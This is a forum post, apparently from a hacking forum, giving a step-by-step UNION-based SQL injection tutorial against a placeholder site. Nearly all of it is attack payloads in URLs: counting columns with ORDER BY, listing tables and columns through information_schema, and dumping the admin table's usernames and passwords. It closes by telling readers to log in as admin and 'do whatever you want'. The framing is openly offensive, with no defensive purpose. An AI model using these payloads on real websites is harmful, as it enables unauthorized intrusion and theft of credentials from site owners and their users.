Jump to content

[Tutorial] Blazer First Sql Injection Tutorial!!!!!


Recommended Posts

 

1. Find a vulnerable website. here is a example!

 

2.

http://www.site.com/index.php?=5'

 

Ps:Don't type error after after this (--)

 

3.

http://www.site.com/index.php?=5 order by 10-- error

 

http://www.site.com/index.php?=5 order by 9-- error

 

http://www.site.com/index.php?=5 order by 8-- No error

:cheers:

 

4. the site has 8 columns.

 

5. Do like below:)

 

6.

http://www.site.com/index.php?=-5 union select 1,2,3,4,5,6,7,8--

 

7. This will show some numbers on the page lets say it is number 3 on the page.

 

8.Let's get some tables:

http://www.site.com/index.php?=-5 union select 1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables--

 

9. You will see tables: check for anything like admin, username, user. I found admin and lets start harvesting:)

 

10.Type this:

http://www.site.com/index.php?=-5 union select 1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_name=database()--

 

11.Now you have the table name and the name is admin that you finded before this.Now  the columns that you will see right now is maybe Username or Password.

 

12. Soo to get the password and username from admin type this.

 

13.

http://www.site.com/index.php?=-5 union select 1,2,group_concat(username,0x3a,password),4,5,6,7,8 from admin

 

14. And press enter.

 

15. you will see this. username:password.

ps: the password can be plain text or in a hash:)

16. now get admin page and login and do whatever you want.

 

17. creedits to blazer15. :cheers:

 

I tried my best! but i hope it will help you:):blackhat:

 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...